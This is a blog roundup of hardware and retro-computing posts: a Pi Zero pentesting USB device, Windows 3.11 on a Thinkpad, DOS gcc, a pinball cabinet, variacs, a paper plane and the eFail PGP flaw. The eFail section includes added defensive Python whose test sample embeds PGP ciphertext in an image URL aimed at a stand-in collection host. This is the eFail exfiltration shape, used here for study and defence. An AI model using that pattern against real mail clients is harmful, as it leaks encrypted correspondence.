DIY Pi Zero Pentesting Tool Keeps It Cheap

It’s a story as old as time: hacker sees cool tool, hacker recoils in horror at the price of said tool, hacker builds their own version for a fraction of the price. It’s the kind of story that we love here at Hackaday, and has been the impetus for countless projects we’ve covered. One could probably argue that, if hackers had more disposable income, we’d have a much harder time finding content to deliver to our beloved readers.

[Alex Jensen] writes in to tell us of his own tale of sticker-shock-induced hacking, where he builds his own version of the Hak5 Bash Bunny. His version might be lacking a bit in the visual flair department, but despite coming in at a fraction of the cost, it does manage to pack in an impressive array of features.

This pentesting multitool can act as a USB keyboard, a mass storage device, and even an RNDIS Ethernet adapter, all in an effort to fool the computer you plug it into into letting you do something you shouldn’t. Like its commercial inspiration, it features an easy-to-use scripting system that allows new attacks to be crafted on the fly with nothing more than a text editor. A rudimentary user interface is provided by four DIP switches and light-up tactile buttons. These allow you to select which attacks run without needing to hook the device up to a computer first, and the LEDs can give you status information on what the device is doing.

[Alex] utilized some code from existing projects, namely PiBunny and rspiducky, but much of the functionality is of his own design. Detailed instructions are provided on how you can build your own version of this handy hacker gadget without breaking the bank.

Given how small and cheap it is, the Raspberry Pi is gaining traction in the world of covert DIY penetration testing tools. While it might not be terribly powerful, there’s something to be said for a device that’s cheap enough that you don’t mind leaving it at the scene if you’ve got to pull on your balaclava and make a break for it.

WFW 3.11 running on a Thinkpad T400

Windows For Workgroups 3.11 In 2018

It’s been 25 years since Microsoft released Windows for Workgroups 3.11. To take a trip back to the end of the 16-bit era of operating system, [Yeo Kheng Meng] got WFW 3.11 running on a modern Thinkpad.

To make things difficult, a few goals were set for the project. Obviously, this wouldn’t be much fun in a virtual machine, so those were banned. A video driver would be needed, since WFW 3.11 only supports resolutions up to 640×480 in software. Some basic support for sound would be desirable. Finally, TCP/IP networking is possible in WFW 3.11, so working networking hardware would allow access to the modern internet.

[Yeo Kheng Meng] accomplished all of these goals on a 2009 Thinkpad T400 and thoroughly documented the process. Some interesting hacks were required, including the design of a custom parallel port sound card based on the Covox Speech Thing. Accessing HTTPS web servers required a man-in-the-middle proxy to strip SSL, since the SSL support in WFW 3.11 is ancient and rejected by most web servers today.

If you want your own WFW 3.11 laptop, the detailed instructions will get you there. [Yeo Kheng Meng] has also provided the hardware design for the sound card. You can watch a talk on the process after the break.


MSDOS Development With GCC

It might seem odd to think about programming in MSDOS in 2018. But if you are a vintage computer enthusiast or have to support some old piece of equipment with an MSDOS single board computer, it could be just the thing. The problem is, where do you get a working compiler that doesn’t have to run on the ancient DOS machine? Turns out, gcc can do the trick. [RenéRebe] offers a video demo based on a blog post by [Chris Wellons]. You can see the video below.

The technique generates COM files, not EXE files, so there are some limitations, such as a 64K file size. The compiler also won’t generate code for any CPU lower than a 80386, so if you have a real 8086, 80186, or 80286 CPU, you are out of luck. The resulting code will run in a real DOS environment on a ‘386 or higher or in a simulator like DOSBox.

You might be thinking: why not use the DJGPP port of gcc to DOS? That sounds good, but it actually doesn’t produce true DOS code. It produces code for a DOS extender. In addition, [Chris] had trouble getting it to work with a modern setup.

The only real trick here is using the right combination of gcc flags to create a standalone image with the right code. A COM file is just a dump of memory, so you don’t need a fancy header or anything. You also, of course, won’t have any library support, so you’ll have to write everything yourself, including functions to, say, print on the screen. Of course, you can borrow [Chris’] if you like.

The last pieces of the puzzle include adding a small stub to set up and call main and getting the linker to output a minimal file. Once you have that, you are ready to program like it is 1993. Don’t miss part 2, which covers interrupts.

If you pine away for QuickBasic instead of C, go download this. If you just want to run some old DOS games, that’s as close as your browser.


Tiny Pinball Emulator Is Hugely Impressive

We were wondering what [Circuitbeard] has been up to lately. Turns out he’s been building a mini pinball cabinet to add to his arcade of self-built games.

[Circuitbeard] was forced to break out of his Raspi comfort zone this time. We’re glad he did because this is one impressive build. Finding the pinball emulation community lacking for Linux, he turned to the LattePanda, a tiny Windows 10 SBC with a built-in Arduino Leonardo. This was really the perfect board because he needed to support multiple displays with a minimum of fuss. That Leonardo comes in handy for converting button presses to key presses inside the Visual Pinball emulator.

The 3mm laser-cut plywood cabinet was designed entirely in Inkscape and sized around the two screens: a genuine 7″ LattePanda display for the playfield, and a 5″ HDMI display for the back glass. The main box holds the LattePanda, two Pimoroni mini speakers, and a fan to keep the board cool.

There’s a lot to like about this little cabinet thanks to [Circuitbeard]’s fantastic attention to detail, which you can see for yourself in the slew of pictures. Look closer at the coin drop—it’s really an illuminated button with a custom graphic. If you want to have a go at emulating this emulator, all the code is up on GitHub. Tilt past the break to watch some modern pinball wizardry in action, and then check out his mini Outrun machine.

If pinball emulators don’t score any points with you, here’s one that’s all wood and rubber bands.


DIY Variacs Get ESP8266 Upgrades

If you’ve been hacking and making long enough, you’ve probably run into a situation where you realize that a previous project could be improved with the addition of technology that simply wasn’t available when you built it. Sometimes it means starting over from scratch, but occasionally you luck out and can shoehorn in some new gear without having to go back to the drawing board.

The two isolated variacs that [nop head] built were already impressive, but with the addition of the ESP8266 he was able to add some very slick additional features which really took them to the next level. He’s done an exceptional job detailing the new modifications, including providing all the source for anyone who might be walking down a similar path.

His variacs have digital energy meters right in the front panel which give voltage, amps, and a real-time calculation of watts. After reading an article by [Thomas Scherrer] about sniffing the SPI data out of one of these meters with an Arduino, [nop head] reasoned he could do the same thing with an ESP8266. The advantage being that he could then pull that data out over the network to graph or analyze however he wishes.

For his older variac, he decided to automate the device by adding a stepper and belt to turn the knob. The stepper is controlled by a Pololu stepper driver, which in turn gets its marching orders from another ESP8266. He even came up with a simple web interface which allows you to monitor and control the variac from your smart device.

We don’t often see many variacs around these parts, and even fewer attempts at building custom ones. It’s one of those pieces of equipment you either can’t live without, or have never even heard of.

RC Paper Airplane From Guts Of Quadcopter

Mini indoor drones have become an incredibly popular gift in the last few years since they’re both cool and inexpensive. For a while they’re great fun to fly around, until the inevitable collision with a wall, piece of furniture, or family member. Often not the most structurally sound of products, a slightly damaged quad can easily be confined to a cupboard for the rest of its life. But [Peter Sripol] has an idea for re-using the electronics from a mangled quad by building his own RC controlled paper aeroplane.

[Peter] uses the two rear motors from a mini quadcopter to provide the thrust for the aeroplane. The key is to remove the motors from the frame and mount them at 90 degrees to their original orientation so that they’re now facing forwards. This allows the drone’s gyro to remain facing upwards in its usual orientation, and keep the plane pointing forwards.

The reason this works is down to how drones yaw: because half of the motors spin the opposite direction to the other half, yaw is induced by increasing the speed of all motors spinning in one direction, mismatching the aerodynamic torques and rotating the drone. In the case of the mini quadcopter, each of the two rear motors spin in different directions. Therefore, when the paper plane begins to yaw off-centre, the flight controller increases power to the appropriate motor.

Mounting the flight controller and motors to the paper plane can be achieved either with a 3D-printed mount [Peter] created, or with a small piece of foam. Shown here is the foam design, which mounts the propellers at wing level, but the 3D-printed version has them under the fuselage and flies a bit better.

Making paper planes too much effort? You could always use the one-stroke paper plane folder, or even the paper plane machine gun.


PGP Vulnerability Pre-announced By Security Researcher

From the gaping maw of the infosec Twitterverse comes horrifying news. PGP is broken. How? We don’t know. When will there be any information on this vulnerability? Tomorrow. It’s the most important infosec story of the week, and it’s only Monday. Of course, this vulnerability already has a name. Everyone else is calling it eFail, but I’m calling it Fear, Uncertainty, and Doubt.

Update: eFail site and paper now available. This was released ahead of Tuesday’s planned announcement when the news broke ahead of a press embargo.

Update 2: The report mentions two attacks. The Direct Exfiltration attack embeds the body of a PGP-encrypted email inside an image tag. If a mail client automatically decrypts this email and renders the HTML, the result will be a request to a URL containing the plaintext of the encrypted email. The second attack only works one-third of the time. Mitigation strategies are to not decrypt email in a client, disable HTML rendering, and in time, update the OpenPGP and S/MIME standards. This is not the end of PGP; it’s a vulnerability warranting attention from those with a very specific use case.

Update 3: Hackaday has published an in-depth explanation of how eFail works which details the scope of the vulnerability.

[Sebastian Schinzel] announced on Twitter today that he will be disclosing a critical vulnerability in PGP/GPG and S/MIME email encryption. This vulnerability may reveal the plaintext of encrypted emails. There are currently no fixes — but there’s no proof of concept, or any actual publication of this exploit either. The only thing that’s certain: somebody on Twitter said encrypted email is broken.

The EFF has chimed in on this exploit and advises everyone to immediately disable and uninstall tools that automatically decrypt PGP-encrypted email. It also looks like the EFF came up with a great little logo for eFail as well so kudos on that.

While there are no details whatsoever concerning eFail aside from a recommendation to not use PGP, a few members of the community have seen a pre-press of the eFail paper. [Werner Koch] of GnuPG says eFail is simply using HTML as a back channel. If this is true, PGP is still safe; you just shouldn’t use HTML emails. If you really need to read HTML emails, use a proper MIME parser and disallow access to external links. It should be noted that HTML in email is already an attack vector and has been for decades. You don’t need to bring PGP into this.
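To make the "HTML as a back channel" point concrete, here is an added example of the two client-side checks the paragraphs above describe: refusing to decrypt when PGP armour sits inside an unterminated URL attribute (the direct-exfiltration shape), and neutralising remote references before rendering. This is not code from the Hackaday post, the eFail paper or GnuPG; the attribute list, the `about:blank` replacement and the sample bodies (with placeholder ciphertext) are assumptions constructed for illustration.

```python
"""Defender-side checks for the eFail direct-exfiltration shape.

Added example; assumes the client has decoded the MIME parts and concatenated
the HTML text around the encrypted part, but has NOT decrypted it yet.
"""
import re
from typing import Tuple

ARMOR = "-----BEGIN PGP MESSAGE-----"

# A fetch-triggering attribute that is still unterminated (no closing quote or
# '>') when the armour starts: after decryption the plaintext lands in the URL.
EXFIL_RE = re.compile(
    r"""\b(?:src|href|action)\s*=\s*["']?https?://[^"'>]*?""" + re.escape(ARMOR),
    re.I,
)

# Any remote src/href/action (assumed attribute list); loading it leaks at
# least "this mail was opened".  cid: references to attached parts are left alone.
REMOTE_REF_RE = re.compile(
    r"""(\b(?:src|href|action)\s*=\s*["']?)(https?://[^"'>\s]*)""", re.I
)


def has_exfil_structure(html: str) -> bool:
    """True if PGP armour sits inside an unterminated URL attribute."""
    return EXFIL_RE.search(html) is not None


def block_remote_refs(html: str) -> Tuple[str, int]:
    """Neutralise every remote reference; returns (safe_html, count_blocked)."""
    return REMOTE_REF_RE.subn(lambda m: m.group(1) + "about:blank", html)


def pre_decrypt_verdict(html: str) -> str:
    """Policy a client could apply before handing the part to the decryptor."""
    if has_exfil_structure(html):
        return "refuse"  # show the raw armour, never decrypt in place
    return "decrypt-sanitized"  # decrypt, then render block_remote_refs() output


# Constructed samples (placeholder ciphertext, not real PGP data).
CIPHERTEXT = "hQEMA0CONSTRUCTEDPLACEHOLDER=\n=abcd"
EFAIL_SHAPED = ('<img src="http://collector.invalid/\n'
                f"{ARMOR}\n{CIPHERTEXT}\n-----END PGP MESSAGE-----\n" '">')
BENIGN = ('<p>Report attached.</p><img src="cid:logo@example">'
          f"<pre>{ARMOR}\n{CIPHERTEXT}\n-----END PGP MESSAGE-----</pre>"
          '<a href="https://example.com/">site</a>')

if __name__ == "__main__":
    for name, body in (("efail-shaped", EFAIL_SHAPED), ("benign", BENIGN)):
        safe, n = block_remote_refs(body)
        print(name, pre_decrypt_verdict(body), f"remote refs blocked: {n}")
```

The regexes only cover plain HTML attributes; a real client would also have to handle CSS `url()` loads and the S/MIME variant the paper describes.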

Should you worry about a vulnerability in PGP and email encryption? Literally no one knows. European security researchers are working on a publication release right now, but other experts in the field who have seen the paper think it’s not a big deal. There is no consensus from experts in the field, and there is no paper available right now. That last point will change in a few hours, but for now eFail just stands for Fear, Uncertainty, and Doubt.